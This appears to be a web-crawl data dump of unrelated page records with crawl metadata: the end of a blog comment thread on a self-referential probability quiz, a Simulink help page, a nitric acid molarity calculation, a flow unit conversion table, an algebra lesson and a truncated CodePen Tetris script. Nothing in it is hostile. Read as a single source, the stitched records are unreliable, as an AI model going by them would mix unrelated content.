.125\n0.5*0.25= 0.125\n0.6*0.25=0.15\nthis adds up to a probability of 40% that it’s none of the answers so the probability should be 1-0.4 which leaves us with 60%\n\n• #30 by fla on October 28, 2011 - 7:24 am", null, "One random answer ? It could be anything. So my guess is that i have 1/infinity to find the correct answer 🙂\n\n• #31 by adam on October 28, 2011 - 8:30 am", null, "• #32 by John O'Brien on October 28, 2011 - 9:01 am", null, "Suppose we take a different problem as our starting point.\nAssuming that we have two options, option A and option B, and the correct answer is 10% of the time is option A, and 90% of the time is Option B. If we chooose either option randomly, and we have\nan equal chance of choosing either option, what are the chances we choose the correct option?\nIn order to answer this problem, we need to figure out what the chances are that the correct answer will be option A, and we will choose option A, or that the correct answer will be option B, and\nwe will choose option B.\nSo..\nOption Chance it is Correct Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 10% 50% 5%\nB 90% 50% 45%\nSo, for option A, it is the correct answer and we choose it as the correct answer 10% * 50% of the time = 5% of the time.\nFor option B, we choose it and it is the correct answer 90% * 50% = 45% of the time.\nAdding them together, 5% + 45% of the time = 50% of the time we choose the correct answer, if we choose randomly.\nNow let’s notice something interesting about this problem. Since the chance that Option A is correct or Option B being correct in sum is 100% (10% + 90% = 100%), we don’t actually need to know that\nchance that option A is correct or the chance that option B is correct. Indeed, since they sum to 100%, and the chance that we choose either one is 50%/50%, any combination of the chance that A is\ncorrect or that B is correct will yield the same percentage of the time we choose the correct answer (that is, 50%).\nThis will be true so long as the chance that we choose either option is evenly split, and the chance that all options are correct sums to 100%.\nNow, if we add four options, and do the same calculation, we get that there is a 25% chance that we choose the right answer.\nOption Chance is it Correct Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 25% 25% 6.25%\nB 25% 25% 6.25%\nC 25% 25% 6.25%\nD 25% 25% 6.25%\n6.25% + 6.25% + 6.25% + 6.25% = 25%\nBut, hang on, you say, if that is the case, then the correct answer is both A and B.\nOkay, I say. So, let’s articulate that as another table, where choosing option A is correct 100% of the time, and choosing option D is correct 100% of the time. Now we end up in a very different circumstance than in the first case, when we just had options A and B. Since the two options are correct, the sum chance that of any option being correct is 200%, not 100%.\nChance it is Correct Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 100% 25% 25%\nB 0% 25% 0%\nC 0% 25% 0%\nD 100% 25% 25%\n50.00%\nWhich would make the *real* correct answer 50%. Does that mean that the real correct answer is to say that 50% was correct 100% of the time?\nLet’s articulate that as another table, where choosing option D is correct 100% of the time.\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 0% 25% 0%\nB 100% 25% 25%\nC 0% 25% 0%\nD 0% 25% 0%\n25%\nSo it appears we have a paradox. If the correct answer is 25%, then we will choose that answer 50% of the time. If the answer is 50%, then we will choose that answer 25% of the time.\nOf course, part of the problem is the phrasing “if you choose to answer this question at random,” which is imprecise. I have taken it to mean if you chooose one of the four options randomly, with\nan equaly chance of choosing any of the four options.\nIf instead (as other commenters have noted) you take the whole answer set as the options to choose among (so the correct answers to choose are either 25%, 50%, or 60%), then the problem does have a\nsolution, but it is not one of the solutions listed.\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 33% 33% one ninth\nB 33% 33% one ninth\nC 33% 33% one ninth\n33%\nWhat if, instead, we presume that “correctness” is intepreted not as the dereferenced value of the answer (where the answer is 25%), but instead as a specific answer (say, either option A or D).\nIf that is the case, there there are two circumstances. A has 100% chance of being right, and D has 0% chance. Or D has 100% chance of being right, and A has 0% chance.\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 100% 25% 25%\nB 0% 25% 0%\nC 0% 25% 0%\nD 0% 25% 0%\n25%\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 0% 25% 0%\nB 0% 25% 0%\nC 0% 25% 0%\nD 25% 25% 25%\n25%\nEither way, 25% is still the right answer, if you define “correctness” as being possible to be applied to just A or D. This circumstance is possible in a computer system (imagine a system that blindly takes just A as the right answer, ignoring the fact that D has the same value), but may be harder to imagine with a human grader.\n\n• #33 by Rochester on October 28, 2011 - 9:41 am", null, "Right answer: What a waste of time!\n\n• #34 by dave on October 28, 2011 - 10:01 am", null, "C.\nWhen guessing at multiple choice questions, people choose C 60% of the time. I’m totally making that up, but it sounds good 😀\n\n• #35 by Marcel on October 28, 2011 - 10:39 am", null, "One solution:\nFirst we should know the question to the optional answers. If we know the question, we can determine the correct answer. Based on the correct answer we can determine the probability of chosing the correct answer randomly (if the correct answer should be listed as an optional answer at all).\nAs the question itself is unknown, we cannot determine the probability as “this question” cannot refer to the question “, what is…”.\nSecond solution:\nIf “this question” should refer to the question “, what is…”, the result would be:\nAn answer to this ‘question’ cannot be determined. As I cannot see the answer ‘cannot be determined’ under A,B,C or D, the probability is 0%.\n\n• #36 by Leon on October 28, 2011 - 7:59 pm", null, "The tricky part of course is formalizing the problem. “If *you* choose an answer to this question at random” means you are making a sequence of random choices, and then see how frequently the particular probability you pre-selected appears in that sequence. So, for example, there is a chance that you pick option C and see it 60% of the time in a particular random sequence, although that chance is obviously small.\nLet’s consider a set of all possible sequences, and see how many of them will yield the right answer for each selection. After N choices made, we have 4 ^ N sequences (ignore for now that A and D are same, we’ll get to it later), each of them equally probable. How many of those have option B appearing at 50% rate? That’s choose N/2 out of N, or N!/ ((N/2)! ^ 2) multiplied by the number of remaining 3 choices (A, C, and D) in the other N/2 positions, which is 3 ^ (N/2), so we get:\n(N! / ((N/2)! * (N/2)!)) * (3 ^ (N/2)) / 4 ^ N\nFor choice C we get:\n(N! / ((N * 3/5)! * (N * 2/5)!)) * (3 ^ (N * 2/5)) / 4 ^ N\nFinally, for A and D, if they were not the same, we’d get:\n(N! / ((N * 3/4)! * (N/4)!) * 3 ^ (N * 3/4)) / 4 ^ N\nBut since A and D are the same, we have 2 ^ (N/4) ways to pick the positions for 0.25% probabilities, and only 2 (instead of 3) for the remaining ones, which is:\n(N! / ((N * 3/4)! * (N/4)!) * 2 ^ (N/4) * 2 ^ (N * 3/4)) / 4 ^ N\nNow, what shall we pick for N? It’s clear that as N is getting larger, probability of getting *any* of the answers *exactly* approaches 0. To understand what’s going on here, think how likely it is to flip a coin 100 times and get heads exactly 50 times. What about getting exactly 500 out of 1000? Although rate of heads will aproach 50%, probability of getting exactly half heads will reduce as number of attempts grows.\nSo let’s try different values for N:\nN = 1 obviously doesn’t work\nN = 2 gives 3/8 for option B, and can’t possibly work with A, C, and D\nN = 3 can’t possibly work\nN = 4 gives 27/128 for B, can’t work for C, and it gives 1/4 for A and D (25%, hooray!)\nWth N > 4 the probabilities go down as expected, for example, with N = 8 we get 7/64 for options A and D. It’s clear that larger values of N can’t possibly work.\nIn other words, out of all 256 (4 ^ 4) possible sequences of 4 choices, 64 have either A or D occuring only once.\nThus we can say that if you make a large number batches of 4 random choices, you’ll find out that a single 25% choice occurs in about 1/4 of them.\n\n• #37 by DR NASH on October 29, 2011 - 9:02 am", null, "• #38 by Satish on October 29, 2011 - 7:46 pm", null, "I consider myself an unlucky person while answering such questions hence the probability of my answer being right will be always on lower side. So I would choose A or D. But since I am not lucky, this might be an wrong answer so the right answer might be B or C. Among B and C, it’s C if i choose B and it’s B if i choose C.\n\n• #39 by Lars Bengtsson on October 30, 2011 - 3:17 am", null, "The chance to choose a correct answer is 50%. Because the correct answers are A and D.\nThe question can be divided into two parts.\n1) choose an answer at random\n2) what is the probability the choise is correct.\nAs Cedric said the ANSWER is among a,b,c,d. But there is no restriction that the answer to 2) is the same as the answer to 1).\n\n• #40 by Dave on October 30, 2011 - 1:36 pm", null, "Depends on who grades the answer, since the idea of correctness is clearly subjective:\n– if someone else does, it’s 0%\nSince the problem states I get to choose the answer, then I’m going to pick the right one (42) and there’s a 100% chance I’m right.\nA follow-on question is whether someone could prove an algorithm halts if no meta-coding (self-modifying, reflective, etc.) is disallowed.\n\n• #41 by Markus on October 31, 2011 - 1:11 pm", null, "It’s a bit unclear what ‘this question’ is, sounds like a trick 🙂\nI’d say: one third.\n\n• #42 by Matthew on November 1, 2011 - 7:04 am", null, "1/3\n\n• #43 by relegation on November 1, 2011 - 11:41 pm", null, "E None of the above\n\n• #44 by Phil Mac on November 2, 2011 - 2:00 am", null, "Um..\nChoosing an answer to ‘this’ question at random..\nSo you can only be either ‘right’ or ‘wrong’.\nSo it’s 50%.\nNo?\n\n• #45 by Jouni on November 2, 2011 - 9:52 pm", null, "", null, "" ]
[ null, "http://2.gravatar.com/avatar/ea91774321962f70f19362f43568cda9", null, "http://2.gravatar.com/avatar/ea91774321962f70f19362f43568cda9", null, "http://0.gravatar.com/avatar/97a472a751e503a7f8e5d88ba087a87c", null, "http://0.gravatar.com/avatar/97a472a751e503a7f8e5d88ba087a87c", null, "http://1.gravatar.com/avatar/77ff45e9e1cc1d3626f7c71cd3ece481", null, "http://0.gravatar.com/avatar/f9d3fd1753683da515e324abbb7d0d4b", null, "http://0.gravatar.com/avatar/0ba5bcfc224fbefb3d97ffcab926ccb3", null, "http://0.gravatar.com/avatar/6883cab0dedd4d45544abfc7eb788e82", null, "http://0.gravatar.com/avatar/97a472a751e503a7f8e5d88ba087a87c", null, "http://2.gravatar.com/avatar/e47a3e81d72676bd497b1cb67f66da97", null, "http://0.gravatar.com/avatar/fad9d486ce723011505e86c2136937ca", null, "http://0.gravatar.com/avatar/fad9d486ce723011505e86c2136937ca", null, "http://0.gravatar.com/avatar/3c2ce5e843cef58cf546b403c6233597", null, "http://0.gravatar.com/avatar/fe3ec04d1300b66c6afd32bf56979e54", null, "http://0.gravatar.com/avatar/97a472a751e503a7f8e5d88ba087a87c", null, "http://0.gravatar.com/avatar/6883cab0dedd4d45544abfc7eb788e82", null, "http://1.gravatar.com/avatar/a59951e9c438c4631cdb23340ff0c640", null, "http://0.gravatar.com/avatar/033aa55eb944034b48b3c6340e241487", null, "http://0.gravatar.com/avatar/361ba1bcc1d2c5a8885dd093dbb96bb6", null, "http://1.gravatar.com/avatar/7035cec2436e927067addeeb5266bd36", null, "http://0.gravatar.com/avatar/6680afd118d07758fa11dad644ad7e27", null, "http://0.gravatar.com/avatar/01516a74d1aa312693218aa5ff4ffb63", null, "http://1.gravatar.com/avatar/d6cf4f08b8344780f218954bd8c9069b", null, "http://2.gravatar.com/avatar/527a683d8bb700e20c39ef69d8529875", null, "http://1.gravatar.com/avatar/14f9f7c54b7a095c2a8a2fbb3d6e8c94", null, "http://0.gravatar.com/avatar/0a889289a86c71a982f7e7d1e1480c8f", null, "http://1.gravatar.com/avatar/1dd3736f66918f01edddfe78d77876ba", null, "http://2.gravatar.com/avatar/5ed3706dd3291f75b9ebcab2650961a5", null, "http://1.gravatar.com/avatar/76c034223be1c459698b4736e319b6b3", null, "http://0.gravatar.com/avatar/6eec27db96118c0028a38db730b81571", null, "http://0.gravatar.com/avatar/fb0a57185d99d23abdcd670484d03e15", null, "http://0.gravatar.com/avatar/3d5b47d25b45957c05451c067ccdae54", null, "http://0.gravatar.com/avatar/31faaf1f7998c363dc34b13026773035", null, "http://1.gravatar.com/avatar/df66f5ffbf986ef9ff5a990f26dbd1f1", null, "http://2.gravatar.com/avatar/20a732bd7c705c92f6549d0d227ae298", null, "http://0.gravatar.com/avatar/9373214d888a03bddf008232c4c10fbc", null, "http://0.gravatar.com/avatar/9c34edfa2b66580233273c13ce7a7dd4", null, "http://0.gravatar.com/avatar/970d61e958eb2ce13c33333157051951", null, "http://0.gravatar.com/avatar/f0bf81d26fa5c570449953d9a7b1cd71", null, "http://0.gravatar.com/avatar/c7c3663ab1535395d529b0f44041c7aa", null, "http://0.gravatar.com/avatar/f31fbede8e3a549fe9ef160a14f1914c", null, "http://2.gravatar.com/avatar/888c6c22f62fe98418992522f648136c", null, "http://1.gravatar.com/avatar/4a48013d97df43a7c16bd10d23316f5c", null, "http://1.gravatar.com/avatar/78e175e77da2fbafabb7799be6183980", null, "http://2.gravatar.com/avatar/ef3a4ac73c55c4f5738e5bc62f699457", null, "http://0.gravatar.com/avatar/c9b295c1711da8d1be93c81165130c19", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93612707,"math_prob":0.9500175,"size":20411,"snap":"2020-24-2020-29","text_gpt3_token_len":6235,"char_repetition_ratio":0.18503454,"word_repetition_ratio":0.08394698,"special_character_ratio":0.3425114,"punctuation_ratio":0.11207859,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98592865,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-16T13:30:33Z\",\"WARC-Record-ID\":\"<urn:uuid:0c1b7517-791f-4327-b064-257252d5121b>\",\"Content-Length\":\"94519\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4e177971-26c1-4b31-bea1-f9084ff12cb1>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2ec9400-b0e1-4b1f-9ae6-842828d45484>\",\"WARC-IP-Address\":\"13.57.86.167\",\"WARC-Target-URI\":\"http://beust.com/weblog/2011/10/27/probability-quiz/\",\"WARC-Payload-Digest\":\"sha1:53KGBQXYHOK7TNIYDWBKGALJXLX2LAOD\",\"WARC-Block-Digest\":\"sha1:KZ6HRNKMPUS2VFWEI3YLDURLR4TR5AD7\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657169226.65_warc_CC-MAIN-20200716122414-20200716152414-00412.warc.gz\"}"}
https://ch.mathworks.com/help/simulink/ug/design-parameter-interface-for-reusable-components.html
[ "## Parameter Interfaces for Reusable Components\n\nYou can use subsystems, referenced models, and custom library blocks as reusable components in other models. For guidelines to help you decide how to componentize a system, see Choose Among Types of Model Components.\n\nTypically, a reusable algorithm requires that numeric block parameters, such as the Gain parameter of a Gain block, either:\n\n• Use the same value in all instances of the component.\n\n• Use a different value in each instance of the component. Each value is instance specific.\n\nBy default, if you use a literal number or expression to set the value of a block parameter, the parameter uses the same value in all instances of the component. If you set multiple block parameter values by using a MATLAB® variable, `Simulink.Parameter` object, or other parameter object in a workspace or data dictionary, these parameters also use the same value in all instances of the component.\n\n### Referenced Models\n\nIf you use model referencing to create a reusable component, to set parameter values that are specific to each instance, configure model arguments for the referenced model. When you instantiate the model by adding a Model block to a different model, you set the values of the arguments in the Model block. When you add another Model block to the same parent model or to a different model, you can set different values for the same arguments. Optionally, if you create more than two instances, you can set the same value for some of the instances and different values for the other instances.\n\nIf a model has many model arguments, consider packaging the arguments into a single structure. Instead of configuring many arguments, configure the structure as a single argument. Without changing the mathematical functionality of the component, this technique helps you to reduce the number of model argument values that you must set in each instance of the component." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71236384,"math_prob":0.85760236,"size":3300,"snap":"2022-40-2023-06","text_gpt3_token_len":614,"char_repetition_ratio":0.18143204,"word_repetition_ratio":0.30518234,"special_character_ratio":0.17848484,"punctuation_ratio":0.108474575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9566534,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-03T03:28:50Z\",\"WARC-Record-ID\":\"<urn:uuid:729d8a11-7fad-4c71-bec4-314bbf14ce6b>\",\"Content-Length\":\"75934\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b14818d0-2926-44d2-a911-0b17919cfdac>\",\"WARC-Concurrent-To\":\"<urn:uuid:87f0e01c-ec83-4146-810a-56e049ee7110>\",\"WARC-IP-Address\":\"104.68.243.15\",\"WARC-Target-URI\":\"https://ch.mathworks.com/help/simulink/ug/design-parameter-interface-for-reusable-components.html\",\"WARC-Payload-Digest\":\"sha1:SNJJVWRXKBUPN6OIPMK322AY2J4SZIZL\",\"WARC-Block-Digest\":\"sha1:FHWL4IL5MOYC6WWEJEHPRFAAIBFNQ5JM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500042.8_warc_CC-MAIN-20230203024018-20230203054018-00083.warc.gz\"}"}
https://www.laboratorynotes.com/molarity-of-70-percent-nitric-acid-hno3/
[ "# Molarity of 70% (w/w) Nitric Acid (HNO3)\n\n• Nitric acid is a clear colorless liquid. A 70% (w/w) concentrated Nitric acid can be obtained from different suppliers.\n• 70% (w/w) Nitric acid means that 100 g of Nitric acid contains 70 g of HNO3.\n• The density of 70% (w/w)Nitric acid is 1.413 g/ml at 25°C which means that the weight of the 1 ml of Nitric acid is 1.413 gram at 25°C.\n• Molarity refers to the number of moles of the solute present in 1 liter of solution.\n• In simple words, 1 mole is equal to the atomic weight of the substance. For example, 1 mole of HNO3 is equal to 63.01 grams of HNO3 (molecular weight = 63.01).\n\n## Calculation procedure:\n\nStep 1: Calculate the volume of 100 grams of Nitric acid.\nFormula:\nDensity =  weight / volume or\nVolume =  weight / density or\nVolume of 100 gram of Nitric acid: 100/1.413 =  70.771 ml\n\nNote: 70% (w/w) Nitric acid means that 100 g of Nitric acid contain 70 g of HNO3.\n\nThe volume of 100 grams of Nitric acid is 70.771 ml. That means 70 grams of HNO3 is present in 70.771 ml of Nitric acid.\n\nStep 2: Calculate how many grams of HNO3 is present in 1000 ml of Nitric acid.\n70.771 ml of Nitric acid contain    = 70 grams of HNO3\n1 ml of Nitric acid will contain       = 70/70.771 grams of HNO3\n1000 ml of Nitric acid will contain = 1000 x 70/70.771 = 989.106 grams of HNO3\n1000 ml of Nitric acid will contain 989.106 grams of HNO3\n\nStep 3: Calculate the number of moles of HNO3 present in 989,106 grams of HNO3.\n63.01 grams of HNO3 is equal to 1 mole.\n1 gram of HNO3 will be equal to 1/63.01 moles.\n989.106 grams will be equal to = 989.106 x 1/63.01 = 15.6976 moles\nTherefore, we can say that 1 liter of Nitric acid contains 15.6976 moles or in other words molarity of 70% (w/w) Nitric acid is equal to 15.6976 M.\n\nUse Calculator to calculate the molarity of concentrated Nitric acid (HNO3) when concentration is given in % by mass (w/w)\nNitric acid (HNO3) Molecular weight: 63.01 g/mol\n\nConcentration of Nitric acid in % (wt/wt) : % (wt/wt)\n\n(Change the % (wt/wt) concentration)\n\nDensity of glacial Nitric acid: g/ml\n\n(Change the density)\n\nMolarity of Nitric acid: 15.698 M", null, "" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI4MCIgaGVpZ2h0PSI4MCIgdmlld0JveD0iMCAwIDgwIDgwIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBzdHlsZT0iZmlsbDojY2ZkNGRiO2ZpbGwtb3BhY2l0eTogMC4xOyIvPjwvc3ZnPg==", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8510852,"math_prob":0.99663055,"size":2263,"snap":"2023-40-2023-50","text_gpt3_token_len":744,"char_repetition_ratio":0.21513945,"word_repetition_ratio":0.1042654,"special_character_ratio":0.3548387,"punctuation_ratio":0.11176471,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9990118,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-09T08:40:31Z\",\"WARC-Record-ID\":\"<urn:uuid:eef8a07b-2b40-48b5-9e09-32239e50f962>\",\"Content-Length\":\"60877\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f5f2bc8a-3128-4bcb-a046-5027ec210e5f>\",\"WARC-Concurrent-To\":\"<urn:uuid:eee2fe39-1652-42c4-befc-241b552be3e9>\",\"WARC-IP-Address\":\"160.153.129.217\",\"WARC-Target-URI\":\"https://www.laboratorynotes.com/molarity-of-70-percent-nitric-acid-hno3/\",\"WARC-Payload-Digest\":\"sha1:27TTD4TFZWD4SEIIJHAZNWNSKTUYDWTW\",\"WARC-Block-Digest\":\"sha1:YUVBUHNWGIUJWKOCVO75GRSHPS2TJBXV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100873.6_warc_CC-MAIN-20231209071722-20231209101722-00440.warc.gz\"}"}
https://www.unitconverters.net/flow/cubic-meter-day-to-pound-hour-gasoline-at-15-5-b0c.htm
[ "", null, "Home / Flow Conversion / Convert Cubic Meter/day to Pound/hour (Gasoline At 15.5%b0C)\n\n# Convert Cubic Meter/day to Pound/hour (Gasoline At 15.5%b0C)\n\nPlease provide values below to convert cubic meter/day [m^3/d] to pound/hour (Gasoline at 15.5%b0C), or vice versa.\n\n From: cubic meter/day", null, "To: pound/hour (Gasoline at 15.5%b0C)\n\n### Cubic Meter/day to Pound/hour (Gasoline At 15.5%b0C) Conversion Table\n\nCubic Meter/day [m^3/d]Pound/hour (Gasoline At 15.5%b0C)\n0.01 m^3/d0.6791423177 pound/hour (Gasoline at 15.5%b0C)\n0.1 m^3/d6.7914231771 pound/hour (Gasoline at 15.5%b0C)\n1 m^3/d67.9142317714 pound/hour (Gasoline at 15.5%b0C)\n2 m^3/d135.8284635428 pound/hour (Gasoline at 15.5%b0C)\n3 m^3/d203.7426953142 pound/hour (Gasoline at 15.5%b0C)\n5 m^3/d339.5711588569 pound/hour (Gasoline at 15.5%b0C)\n10 m^3/d679.1423177139 pound/hour (Gasoline at 15.5%b0C)\n20 m^3/d1358.2846354278 pound/hour (Gasoline at 15.5%b0C)\n50 m^3/d3395.7115885695 pound/hour (Gasoline at 15.5%b0C)\n100 m^3/d6791.4231771389 pound/hour (Gasoline at 15.5%b0C)\n1000 m^3/d67914.231771389 pound/hour (Gasoline at 15.5%b0C)\n\n### How to Convert Cubic Meter/day to Pound/hour (Gasoline At 15.5%b0C)\n\n1 m^3/d = 67.9142317714 pound/hour (Gasoline at 15.5%b0C)\n1 pound/hour (Gasoline at 15.5%b0C) = 0.0147244543 m^3/d\n\nExample: convert 15 m^3/d to pound/hour (Gasoline at 15.5%b0C):\n15 m^3/d = 15 × 67.9142317714 pound/hour (Gasoline at 15.5%b0C) = 1018.7134765708 pound/hour (Gasoline at 15.5%b0C)" ]
[ null, "https://www.unitconverters.net/images/calculator.svg", null, "https://www.unitconverters.net/images/switch.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74649954,"math_prob":0.86123747,"size":1416,"snap":"2022-27-2022-33","text_gpt3_token_len":642,"char_repetition_ratio":0.32719547,"word_repetition_ratio":0.10674157,"special_character_ratio":0.5035311,"punctuation_ratio":0.1260997,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9814502,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T19:17:13Z\",\"WARC-Record-ID\":\"<urn:uuid:fa2aa704-79ec-4d50-a6e9-979c19f29535>\",\"Content-Length\":\"12940\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2e7bcde-55e2-4f12-83bb-cd876dafb9c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:df577c1c-f4f6-47fb-900f-2cadd9d60657>\",\"WARC-IP-Address\":\"69.10.42.204\",\"WARC-Target-URI\":\"https://www.unitconverters.net/flow/cubic-meter-day-to-pound-hour-gasoline-at-15-5-b0c.htm\",\"WARC-Payload-Digest\":\"sha1:CQP6PLDLM22GU4FSFALO54O6CDSPJR5E\",\"WARC-Block-Digest\":\"sha1:GVA3SBYMH2AOMEXBUF42DCZH6E6LXW67\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103945490.54_warc_CC-MAIN-20220701185955-20220701215955-00043.warc.gz\"}"}
https://www.teachoo.com/8692/2807/Statements-to-expressions/category/Statements-to-expressions/
[ "Statements to expressions\n\nChapter 11 Class 6 Algebra\nConcept wise\n\nLet’s learn how to convert a situation into an expression.\n\nFirst\n\nwe find variable in our situation\n\nand then make an expression.\n\n Situation Variable Expression Sarita has 10 more marbles than Ameena. Let Marbles with Ameena = x Marbles with Sarita            = x + 10 Balu is 3 years younger than Raju Let Raju’s Age = x years Balu’s age        = (x − 3) years Bikash is twice as old as Raju. Let, Raju’s age = x years Bikash’s age   = 2 × 𝑥         = 2x years Raju’s father’s age is 2 years more than 3 times Raju’s age. Let Raju’s Age = x years Raju’s father's age        = (3x + 2) years How old will Susan be 5 years from now? Let, Susan’s Age = y years Susan’s age after 5 years        = (y + 5) years How old was Susan 4 years ago ? Let, Susan’s Age = y years Susan’s age 4 years ago      = (y − 4) years Price of wheat per kg is rupees 5 less Let,  Price of rice per kg = p Rupees Price of wheat per kg       = (p − 5) rupees Price of oil per litre is 5 times the price of rice per kg. Let,  Price of rice per kg      = p Rupees Price of oil per litre = 5p rupees The speed of a bus is 10 km/hour more than the speed of a truck going on the same road. Let, Speed of truck   = y km/hr Speed of bus = (y + 10) km/hr Ali has twice as much apps as Nandan do. Let, Number of apps with Nandan = x No. of apps with Ali = 2x Rajshri has got 3 more certificates than Kamal. Let,  No: of certificates that Kamal has = x No: of certificates that Rajshri has   = x + 3 Anthony has 10 toys less than Kabir Let, Number of toys with Kabir = x Let, Number of toys Anthony have = x - 10 Sumit's weight is one-third of his grandfather's weight Let, Weight of Sumit’s grand father = w Weight of Sumit   = w/3\n\n641 students have Teachoo Black. What are you waiting for?", null, "" ]
[ null, "https://www.teachoo.com/static/misc/Davneet_Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88591945,"math_prob":0.9980881,"size":1455,"snap":"2022-05-2022-21","text_gpt3_token_len":513,"char_repetition_ratio":0.15506548,"word_repetition_ratio":0.1626506,"special_character_ratio":0.33814433,"punctuation_ratio":0.06354515,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99440765,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-27T12:25:15Z\",\"WARC-Record-ID\":\"<urn:uuid:fa176987-78d7-4ef4-8a25-5ce250321689>\",\"Content-Length\":\"145989\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b64bc63a-2a0f-4524-ab59-1208433cb24b>\",\"WARC-Concurrent-To\":\"<urn:uuid:bf9c5318-1558-4564-be94-bd33881aee9c>\",\"WARC-IP-Address\":\"18.232.245.187\",\"WARC-Target-URI\":\"https://www.teachoo.com/8692/2807/Statements-to-expressions/category/Statements-to-expressions/\",\"WARC-Payload-Digest\":\"sha1:OWEG5VEPJRUZ4USROAYYDQN7QHEC5FZ2\",\"WARC-Block-Digest\":\"sha1:LTIURNMKEH6UBGLU6O3262YZJZTIPB6T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662647086.91_warc_CC-MAIN-20220527112418-20220527142418-00249.warc.gz\"}"}
https://codepen.io/dylangggg/pen/pQJzpz
[ "## Pen Settings\n\n### CSS\n\n#### Vendor Prefixing\n\nAny URLs added here will be added as `<link>`s in order, and before the CSS in the editor. You can use the CSS from another Pen by using its URL and the proper URL extension.\n\n### JavaScript\n\n#### JavaScript Preprocessor\n\nBabel includes JSX processing.\n\nAny URL's added here will be added as `<script>`s in order, and run before the JavaScript in the editor. You can use the URL of any other Pen and it will include the JavaScript from that Pen.\n\n### Packages\n\nSearch for and use JavaScript packages from npm here. By selecting a package, an `import` statement will be added to the top of the JavaScript editor for this package.\n\n### Behavior\n\n#### Save Automatically?\n\nIf active, Pens will autosave every 30 seconds after being saved once.\n\n#### Auto-Updating Preview\n\nIf enabled, the preview panel updates automatically as you code. If disabled, use the \"Run\" button to update.\n\n#### Format on Save\n\nIf enabled, your code will be formatted when you actively save your Pen. Note: your code becomes un-folded during formatting.\n\n## HTML\n\n``` ```\n\n```\n```\n!\n\n## CSS\n\n``` ```\n/* style.css */\n\nhtml, body {\nheight: 100%;\n}\n\nbody {\nmargin: 0;\ndisplay: flex;\n\n/* This centers our sketch horizontally. */\njustify-content: center;\n\n/* This centers our sketch vertically. */\nalign-items: center;\n\nbackground-color: black;\n}\n```\n```\n!\n\n## JS\n\n``` ```\nvar gridSpace = 30;\n\nvar fallingPiece;\nvar gridPieces = [];\nvar gridWorkers = [];\n\nvar currentScore = 0;\nvar currentLevel = 1;\nvar linesCleared = 0;\n\nvar ticks = 0;\nvar updateEvery = 15;\nvar updateEveryCurrent = 15;\nvar fallSpeed = gridSpace * 0.5;\nvar pauseGame = false;\nvar gameOver = false;\n\nvar gameEdgeLeft = 